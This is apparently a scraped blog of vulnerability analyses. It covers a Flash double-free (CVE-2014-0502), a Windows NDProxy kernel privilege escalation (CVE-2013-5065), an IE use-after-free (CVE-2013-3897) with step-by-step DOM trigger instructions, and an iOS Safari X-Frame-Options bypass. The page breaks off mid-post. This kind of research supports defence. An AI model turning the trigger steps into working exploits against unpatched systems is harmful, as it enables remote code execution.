<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicBc-iw40QepQ12_xNdtDf_Yit8yFYa0TQwNqauWiJ9zNtDLs1XnlhJe2TkSCOc6T4YELgWrO5AzjZN0whZL0vWXYR3WtY0D2ss0tT0s6Cp4GGrODuBCJwL1BGwlhiKYfUZbGPPaMySmU/s1600/002-CrashIDAPro2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicBc-iw40QepQ12_xNdtDf_Yit8yFYa0TQwNqauWiJ9zNtDLs1XnlhJe2TkSCOc6T4YELgWrO5AzjZN0whZL0vWXYR3WtY0D2ss0tT0s6Cp4GGrODuBCJwL1BGwlhiKYfUZbGPPaMySmU/s1600/002-CrashIDAPro2.png" width="100%" /></a></div>
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br />This specific flow will result in the “Pending Flush” flag being up when the object was already freed, and therefore Adobe Flash Player will try to execute a function from a dereferenced pointer otherwise known as remote code execution. </span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;">I originally posted this post on spiderlabs blog. for more details read the<a href="http://blog.spiderlabs.com/2014/03/deep-analysis-of-cve-2014-0502-a-double-free-story.html"> full story</a>.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com3tag:blogger.com,1999:blog-7534521580510357281.post-54780528851713573052014-03-19T12:53:00.002+02:002014-05-10T18:09:55.708+03:00<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">The Kernel is calling a zero(day) pointer – CVE-2013-5065 – Ring Ring</span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif;">Here's my analysis of a PDF file which contained two different vulnerabilities, a remote-code-execution vulnerability in Adobe Reader and a new escalation-of-privileges </span><span style="font-family: Arial, sans-serif;">zero-day </span><span style="font-family: Arial, sans-serif;">vulnerability in Windows Kernel.</span><br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif; font-size: large;">The full story:</span><br />
<span style="font-family: Arial, sans-serif; font-size: large;"><a href="http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html">http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html</a></span><br />
<br />
<span style="font-family: Arial, sans-serif;">A flaw in NDProxy driver while processing Telephony Application Programming Interface (TAPI) operations, was used to cause the Kernel to dispatch out-of-boundaries function. Therefore, one could exploit this vulnerability and gain SYSTEM privileges and bypass different sandbox protections.</span><br />
<br />
<span style="font-family: Arial, sans-serif;"><i>The vulnerability allows index control of the following static function table, which get executed in the kernel context:</i></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOlKh-bxfTrC6CTxd0vFCze5_jkt3Jhq9W5dmQEMqc7pM2Xpnebwhk-zVwbVObW656IApXw-1fJMn3csEnpyo72Sr2DWbsUvTuHOElcFQ3sWV1_GWRxzBOVakTgovWAyfvrZwv_XmrWyE/s1600/Capture.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOlKh-bxfTrC6CTxd0vFCze5_jkt3Jhq9W5dmQEMqc7pM2Xpnebwhk-zVwbVObW656IApXw-1fJMn3csEnpyo72Sr2DWbsUvTuHOElcFQ3sWV1_GWRxzBOVakTgovWAyfvrZwv_XmrWyE/s1600/Capture.PNG" width="100%" /></a></span></div>
<br />
<i style="font-family: Arial, sans-serif; text-align: center;">Dispatching the invalid PxTapi function results access to address 0x0 in memory and crash:</i><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOlKh-bxfTrC6CTxd0vFCze5_jkt3Jhq9W5dmQEMqc7pM2Xpnebwhk-zVwbVObW656IApXw-1fJMn3csEnpyo72Sr2DWbsUvTuHOElcFQ3sWV1_GWRxzBOVakTgovWAyfvrZwv_XmrWyE/s1600/Capture.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AJcnWIIsuGL33PX0AVzL97hHN95NFqTz0i_dGIYdV9MV7Uo-96ILyB7dhi8S9X0M41t9nwWnE6IQlrrmFSc2Pn5WP7-jsoVHJI_JjGHw81Uc2oB5ZsLHZ8XXP7jsC6eXCnpt3HOE26M/s1600/6a0133f264aa62970b019b029d1cc7970d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AJcnWIIsuGL33PX0AVzL97hHN95NFqTz0i_dGIYdV9MV7Uo-96ILyB7dhi8S9X0M41t9nwWnE6IQlrrmFSc2Pn5WP7-jsoVHJI_JjGHw81Uc2oB5ZsLHZ8XXP7jsC6eXCnpt3HOE26M/s1600/6a0133f264aa62970b019b029d1cc7970d.png" width="100%" /></a></div>
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
</div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-39150832013310336672013-11-10T11:47:00.002+02:002014-05-10T18:09:40.827+03:00<h2>
<span style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif; font-size: x-large;">The Technical Aspects of Exploiting IE Zero-Day CVE-2013-3897</span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15.555556297302246px; line-height: 18.64583396911621px;">Just last month, during our work at spiderlabs research, the team and myself had the chance to analyze CVE-2013-3897 Use-after-free vulnerability.</span><br />
<span style="font-family: Helvetica, Verdana, Arial sans-serif;"><span style="line-height: 18.64583396911621px;">This vulnerability was basically a result of an object type CDisplayPointer being freed and used again when a richtext tries to scroll the pointer into the current view.</span></span><br />
<span style="font-family: Helvetica, Verdana, Arial sans-serif;"><span style="line-height: 18.64583396911621px;">A flow that includes a selection, that </span></span><span style="font-family: Helvetica, Verdana, 'Arial sans-serif'; line-height: 18.64583396911621px;">occurs under "onpropertychange" event, and a DOM that contains a textarea structure (detailed below) results a possible remote code execution.</span><br />
<br />
<b style="color: #999999; font-family: Arial; font-size: xx-large;">Breaking it to down</b></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<span style="font-size: 15px; line-height: 18.65625px;">1. Create a </span><em style="font-size: 15px; line-height: 18.65625px;">TEXTAREA </em><span style="font-size: 15px; line-height: 18.65625px;">and apply a different element as a child using a</span><em style="font-size: 15px; line-height: 18.65625px;">pplyElement</em><span style="font-size: 15px; line-height: 18.65625px;">. This will place the</span><em style="font-size: 15px; line-height: 18.65625px;">address</em><span style="font-size: 15px; line-height: 18.65625px;"> element as the child of the </span><em style="font-size: 15px; line-height: 18.65625px;">textarea</em><span style="font-size: 15px; line-height: 18.65625px;"> element.</span></div>
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead214970b-pi" style="color: #0099ff; display: inline; font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;"><img alt="Steps1" class="asset asset-image at-xid-6a0133f264aa62970b019affead214970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead214970b-500wi" style="border: 0px;" title="Steps1" width="100%" /></a><br />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
2. Trigger a <em>select</em> event on the <em>TEXTAREA</em> element to create an instance of DisplayPointer.</div>
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead477970c-pi" style="color: #0099ff; display: inline; font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;"><img alt="Steps2" class="asset asset-image at-xid-6a0133f264aa62970b019affead477970c" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead477970c-500wi" style="border: 0px;" title="Steps2" width="100%" /></a><br />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
3. Inside <em>onselect</em> event change the <em>value</em> property of the <em>TEXTAREA</em> element, which in turn will fire the event<em>onpropertychange.</em> For example, usage of <em>appendChild</em> or <em>swapNode </em>will cause this behavior. </div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead4e2970c-pi" style="color: #0099ff; display: inline;"><img alt="Steps3" class="asset asset-image at-xid-6a0133f264aa62970b019affead4e2970c" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead4e2970c-500wi" style="border: 0px;" title="Steps3" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
Notice that id_2 (“<em>address”</em> element) is a child of the <em>TEXTAREA</em> element. By swapping that element we remove it from layout of “textarea” and insert a different element, therefore the <em>value </em>property changes.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<em>4.</em> The event <em>onpropertychange </em>is triggered</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affeb4a7f970d-pi" imageanchor="1" style="color: #0099ff; display: inline;"><img alt="Steps4" class="asset asset-image at-xid-6a0133f264aa62970b019affeb4a7f970d" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affeb4a7f970d-500wi" style="border: 0px;" title="Steps4" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
5. In the next stage we basically need to change the position of the display pointer within the <em>TEXTAREA </em>layout. In the original exploit <em>document.execCommand(“UnSelect”)</em> was used. However, selecting a different element, executing the <em>SelectAll</em> command or any operation that causes a DisplayPointer position change will also work. </div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead47a970b-pi" imageanchor="1" style="color: #0099ff; display: inline;"><img alt="1" class="asset asset-image at-xid-6a0133f264aa62970b019affead47a970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead47a970b-500wi" style="border: 0px;" title="1" width="100%" /></a><br />
<div class="photo-caption caption-xid-6a0133f264aa62970b019affead47a970b" id="caption-xid-6a0133f264aa62970b019affead47a970b" style="font-family: inherit; font-size: 14px; font-style: italic; line-height: 1.4em; padding: 10px 0px;">
The attacker used "UnSelect" command</div>
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
6. The JavaScript selection causes a call to CDisplayPointer::ScrollIntoView, which tries to set a new position for the DisplayPointer. At this stage, the reference to CMarkupPointer is already released by the CDisplayPointer::Release function (as a result of the “UnSelect” command) and therefore points to an attacker-controlled heap area.</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
The flow eventually gets into QIClassID, which tries to execute “CMarkupPointer::QueryInterface” (located at offset 0x0 in CMarkupPointer’s virtual table).</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
QIClassID (use): </div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a class="asset-img-link" href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead5a3970b-pi" imageanchor="1" style="color: #0099ff;"><img alt="Blog 2" class="asset asset-image at-xid-6a0133f264aa62970b019affead5a3970b" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead5a3970b-500wi" style="border: 0px;" title="Blog 2" width="100%" /></a><br />
<div class="photo-caption caption-xid-6a0133f264aa62970b019affead5a3970b" id="caption-xid-6a0133f264aa62970b019affead5a3970b" style="font-family: inherit; font-size: 14px; font-style: italic; line-height: 1.4em; padding: 10px 0px;">
QIClassID disassemble crash point</div>
</div>
<br style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px;" />
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
At the crash we end up with the following stack trace:</div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead605970b-pi" imageanchor="1"><img alt="Stack" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b019affead605970b-500wi" style="border: 0px;" title="Stack" width="100%" /></a></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
<br /></div>
<div style="font-family: Helvetica, Verdana, 'Arial sans-serif'; font-size: 15px; line-height: 18.65625px; margin-bottom: 15px; margin-top: 15px;">
CMarkupPointer freed and then used by QIClassID:</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwgC-XBgyF9SG1L80IsRqd3T0LEqD8qpQaGyvugHgay1JQKUTqIVrAUVtvT3CrQQ8LS9z5FDfnPGaGktDbCYKzkLOu9jhc1VEZedikP-z4eSqlSGgngaHhG1qFuFqc-R0rmxfkfVIXnXY/s1600/blog1.PNG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwgC-XBgyF9SG1L80IsRqd3T0LEqD8qpQaGyvugHgay1JQKUTqIVrAUVtvT3CrQQ8LS9z5FDfnPGaGktDbCYKzkLOu9jhc1VEZedikP-z4eSqlSGgngaHhG1qFuFqc-R0rmxfkfVIXnXY/s400/blog1.PNG" width="100%" /></a>
</div>
<span style="font-family: Arial;">Most of this post was originally generated here:</span><br />
(<a href="http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html" target="_blank">http://blog.spiderlabs.com/2013/10/ie-zero-day-cve-2013-3897-technical-aspects.html</a>)<br />
<span style="font-family: Arial, sans-serif;"><br /></span>
<span style="font-family: Arial, sans-serif;"><br /></span></div>
</div>
</div>
[Ben Hayak]http://www.blogger.com/profile/09473158121408723877noreply@blogger.com0tag:blogger.com,1999:blog-7534521580510357281.post-41308673589241413672013-02-11T02:37:00.001+02:002013-02-11T10:49:46.674+02:00X-Framing them all! - Cross-Framing is "impossibe" - Apple’s iOS 5<h2>
<span class="Apple-style-span" style="color: #f6b26b; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large;">Cross Framing Google, Facebook and whoever you wish.</span><span style="font-size: large;"> </span></span></h2>
<div>
<div style="direction: ltr;">
<div style="direction: ltr;">
<br />
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Jailbreak Your Device? or buy android?</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">This post is mostly for people who hold iPhone/iPad/iPod or any
other iDevice.<span dir="RTL" lang="HE"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">As for today at least for most people, jailbreaking is a serious
concern and as for my experience it can even determine whether or not
to purchase IOS(Apple) or Android(Google) device.</span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"> there are quite many differences
that comes to mind, one bold example is that the exact same application
(whatsapp for example) would be free if you hold an smart-device who runs
android, and would cost money if you use iDevice unless it is jailbreaked. <o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Some people even say the reason there was no jailbreak for iPhone5
might affected the apple sales, New York Times post on “Apple Earnings”</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: x-small;"><span style="line-height: 14px;"><i>“Once-euphoric investors, who pushed Apple’s stock to a record high of $702.10 last September, have become nervous, and in early trading on Thursday, the stock traded at $455.89, down more than 34 percent from its peak.” (http://www.nytimes.com/2013/01/24/technology/apple-earnings.html)</i></span></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: 9pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: Arial, sans-serif; font-size: 9pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Are you, behind? IOS 5.1.1? 6.0.1?</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">
Since the only reason to convince us to upgrade to IOS 6 are update you <b>already
have</b> with your installed Cydia tweaks, people just </span><span style="font-family: Arial, sans-serif;">“stay behind” </span><span style="font-family: Arial, sans-serif;">and use IOS 5.1.1 or lower </span><span style="font-family: Arial, sans-serif;">to
still have a nice jailbreaked iPhone. </span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><b>So you use IOS 5 or lower? Are you Safe?<o:p></o:p></b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">As for today we already know there are many web application
vulnerabilities around, client side attacks and mostly cross site scripting
have become one of the most common attacks in the past recent years.<br /><br />
Google, Facebook, Microsoft, Paypal, Mozilla, Apple and many other great
companies have tried to fight against the security risks to give us - their product customers, the answer to keep our data safe. <o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: #ffd966;">But do they?</span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Many of the web application developers had to <span style="color: #ffd966;">deal with many different
client side attacks and design</span> their security architecture to protect their
users and avoid different hacking attempts targeting their customers, since
some attacks such as <span style="color: #ffd966;">frame-busting click-jacking, multiple stage attack, self-XSS
exploitation</span> etc, are not easy to deal with and require <b><span style="color: #9fc5e8;">browser cooperation</span></b>.<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">There are quite a few client side security solutions such as Anti-XSS
filters; No-Script, XSS-Auditor, SoP different headers, Caching, and <span style="color: #ffd966;">X-Frame-Options
header which define how the interpreter handles a response from a webpage
loaded insde frames.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #999999; font-family: Arial; font-size: x-large;"><b>Safari on your iPhone(or iDevice) – you <u>CHOOSE </u>to stay vulnerable:</b></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<br /></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">So Google’s/Facebook’s/Paypal’s/Any_Other web developers(including
myself) can rely on browser implemented security features and protect their
webpages from Client side attacks mostly from Click-Jacking and staging attacks
with<span style="color: #ffd966;"> X-Frame-Options,</span> setting it so that the webpage content will <span style="color: #ffd966;">only be
displayed after a request coming from the Same-Origin</span> or completely disable
Framing and thinking everything is now secured, what we unfortunately forget it is basing the protection on browser's client security. </span><br />
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span>
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: #eeeeee;"><b>What if the browser fail?</b></span><o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">I reported to apple 2 months ago at 06/12/12, that I discovered
that even though the web server (in this example “www.google.com”) set HTTP
response header, X-Frame-Options Header to Same Origin the response will still be displayed using my iDevice.<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">As you can see in the following PoC HTTP response while sending
HTTP request to Google.com:<o:p></o:p></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><span style="color: orange;">HTTP/1.1 200 OK<br />
Date: Thu, 06 Dec 2012 15:54:50 GMT<br />
Expires: -1<br />
Cache-Control: private, max-age=0<br />
Content-Type: text/html; charset=UTF-8<br />
Server: gws<br />
X-XSS-Protection: 1; mode=block</span><br />
<span style="color: #f3f3f3;"><b>X-Frame-Options: SAMEORIGIN</b></span><br /><span style="color: orange;">
Content-Length: 99283 <o:p></o:p></span></span></div>
<div class="MsoNormal" style="background-repeat: initial initial; direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="background-repeat: initial initial; direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">Setting this header suppose to provide browser
client side security that will allow the iframe element to be displayed <b>only</b>
if the parent document is at the same origin/domain of the iframe src
attribute.</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="font-family: "Arial","sans-serif"; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;">It appears the<span style="color: #222222;"> </span><b><span style="color: red;">Safari
Browser does not enforce X-Frame-Options</span></b> </span><span style="font-family: Arial, sans-serif;">and therefore displays our frame element as it did not even have any protection.</span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
<span style="color: #222222; font-family: "Arial","sans-serif"; font-size: 9.0pt; line-height: 115%; mso-ascii-theme-font: minor-bidi; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-theme-font: minor-bidi;"><br /></span></div>
<div class="MsoNormal" style="direction: ltr; unicode-bidi: embed;">
</div>
<br />
<span style="font-family: Arial;">Normal Behavior IE9 enforcing X-Frame-Options: </span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKr5llAqFqlO2_WHSXd1l-uJ7jnQnXrZk8iiH5FW2hrdISJkqCcRvwShyphenhyphenSz1Z6CIx9zfmZWqc4kf3antqXRB9zK-s_dr0lA0gLPWxCTWh_cIz482LiGLs-dIwP9FqazhHhFnqQl0jIjA/s1600/PoC+apple.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKr5llAqFqlO2_WHSXd1l-uJ7jnQnXrZk8iiH5FW2hrdISJkqCcRvwShyphenhyphenSz1Z6CIx9zfmZWqc4kf3antqXRB9zK-s_dr0lA0gLPWxCTWh_cIz482LiGLs-dIwP9FqazhHhFnqQl0jIjA/s400/PoC+apple.PNG" width="400" /></a></div>
<br />
<br />
<span style="font-family: Arial;"><br /></span>
<span style="font-family: Arial;">Safari on IOS 5:</span><br />
<span style="font-family: Arial;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
